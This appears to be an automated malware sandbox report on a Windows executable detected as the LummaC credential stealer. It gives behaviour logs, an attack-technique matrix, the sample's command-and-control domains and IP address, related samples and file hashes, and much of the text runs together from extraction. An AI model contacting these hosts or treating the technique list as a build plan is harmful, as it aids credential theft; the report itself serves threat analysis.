                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\random.exe.10.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000003.00000003.1611561835.0000000000E04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1611809499.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: random.exe.10.exe PID: 7908, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: random.exe.10.exe PID: 7908, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                11
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol31
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager141
                Security Software Discovery
                SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS11
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials21
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                random.exe.10.exe74%ReversingLabsWin32.Trojan.LummaStealer
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://pancakedipyps.click:443/api0%Avira URL Cloudsafe
                https://pancakedipyps.click:443/apihs0%Avira URL Cloudsafe
                https://pancakedipyps.click/apiF0%Avira URL Cloudsafe
                https://pancakedipyps.click/X0%Avira URL Cloudsafe
                https://pancakedipyps.click:443/apiV0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                pancakedipyps.click
                104.21.23.76
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  pancakedipyps.clickfalse
                    high
                    necklacebudi.latfalse
                      high
                      aspecteirs.latfalse
                        high
                        sustainskelet.latfalse
                          high
                          crosshuaht.latfalse
                            high
                            rapeflowwj.latfalse
                              high
                              https://pancakedipyps.click/apifalse
                                high
                                energyaffai.latfalse
                                  high
                                  grannyejh.latfalse
                                    high
                                    discokeyus.latfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabrandom.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#random.exe.10.exefalse
                                            high
                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0random.exe.10.exefalse
                                              high
                                              http://ocsp.sectigo.com0random.exe.10.exefalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#random.exe.10.exefalse
                                                    high
                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://pancakedipyps.click/random.exe.10.exe, random.exe.10.exe, 00000003.00000003.1556346819.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1697099979.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1738037021.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580204789.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1581457141.0000000003712000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580105512.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1557069609.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1580349074.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738879819.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1651202964.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1651102094.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737376014.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1612223125.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1556181740.0000000003707000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://pancakedipyps.click:443/apirandom.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0random.exe.10.exefalse
                                                          high
                                                          https://pancakedipyps.click:443/apihsrandom.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://x1.c.lencr.org/0random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://x1.i.lencr.org/0random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrandom.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctarandom.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allrandom.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#random.exe.10.exefalse
                                                                      high
                                                                      https://sectigo.com/CPS0random.exe.10.exefalse
                                                                        high
                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icorandom.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#random.exe.10.exefalse
                                                                            high
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://pancakedipyps.click/apiFrandom.exe.10.exe, 00000003.00000003.1578903064.000000000370D000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1579093508.000000000370F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://ocsp.rootca1.amazontrust.com0:random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.ecosia.org/newtab/random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brrandom.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://pancakedipyps.click/Xrandom.exe.10.exe, 00000003.00000003.1555532464.0000000003707000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1555702012.0000000003707000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://ac.ecosia.org/autocomplete?q=random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://pancakedipyps.click:443/apiVrandom.exe.10.exe, 00000003.00000003.1737571443.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yrandom.exe.10.exefalse
                                                                                            high
                                                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgrandom.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zrandom.exe.10.exefalse
                                                                                                high
                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?random.exe.10.exe, 00000003.00000003.1580528606.000000000374B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&urandom.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgrandom.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYirandom.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          104.21.23.76
                                                                                                          pancakedipyps.clickUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1577461
                                                                                                          Start date and time:2024-12-18 13:48:40 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 5m 1s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:7
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:random.exe.10.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 50%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          • Number of executed functions: 13
                                                                                                          • Number of non-executed functions: 45
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Stop behavior analysis, all processes terminated
                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56
                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target random.exe.10.exe, PID 7908 because there are no executed function
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: random.exe.10.exe
                                                                                                          TimeTypeDescription
                                                                                                          07:49:47API Interceptor8x Sleep call for process: random.exe.10.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          104.21.23.76random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                        http://www.czeywd.net/perishing-flavoring/7ec4w2395u86zL12Q21YJ51Rc07R28UHsr8D_u4IIr-6IwxfhDtvsFEsvZ7zQboRoK5AH10Y6B1i@XbGet hashmaliciousPhisherBrowse
                                                                                                                          http://www.chkfmrc.net/a7f5s2n395K86ll11i1Uf0fw9dez18gZ_asttfFibYG4EsvZ7JQ1o9RR5zVW106Ik2i3b/shamefully-illogicalGet hashmaliciousUnknownBrowse
                                                                                                                            http://www.chkfmrc.net/a7f5s2n395K86ll11i1Uf0fw9dez18gZ_asttfFibYG4EsvZ7JQ1o9RR5zVW106Ik2i3b/shamefully-illogicalGet hashmaliciousPhisherBrowse
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              pancakedipyps.clickrandom.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              random.exe_Y.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                              • 172.67.209.202
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                              • 172.67.209.202
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Poverty Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                              • 172.67.209.202
                                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                              • 172.67.209.202
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              CLOUDFLARENETUSPAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                              • 104.21.67.152
                                                                                                                              cali.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.26.13.205
                                                                                                                              http://www.mynylgbs.comGet hashmaliciousUnknownBrowse
                                                                                                                              • 1.1.1.1
                                                                                                                              http://johnlewispartners.shopGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.19.163.95
                                                                                                                              v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 172.67.157.254
                                                                                                                              winrar-x64-701.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.80.99
                                                                                                                              CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 104.21.66.86
                                                                                                                              winrar-x64-701.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 172.67.177.42
                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 172.67.157.254
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              winrar-x64-701.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              winrar-x64-701.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              99awhy8l.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              random.exe_Y.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                              • 104.21.23.76
                                                                                                                              No context
                                                                                                                              No created / dropped files found
                                                                                                                              File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                              Entropy (8bit):7.859727158445845
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:random.exe.10.exe
                                                                                                                              File size:776'832 bytes
                                                                                                                              MD5:afd936e441bf5cbdb858e96833cc6ed3
                                                                                                                              SHA1:3491edd8c7caf9ae169e21fb58bccd29d95aefef
                                                                                                                              SHA256:c6491d7a6d70c7c51baca7436464667b4894e4989fa7c5e05068dde4699e1cbf
                                                                                                                              SHA512:928c15a1eda602b2a66a53734f3f563ab9626882104e30ee2bf5106cfd6e08ec54f96e3063f1ab89bf13be2c8822a8419f5d8ee0a3583a4c479785226051a325
                                                                                                                              SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                              TLSH:75F4120237C085B2D92324B5A8F8DF765B3EF8204B226AE75788073B8FB15D6477664D
                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<..
                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                              Entrypoint:0x405952
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:true
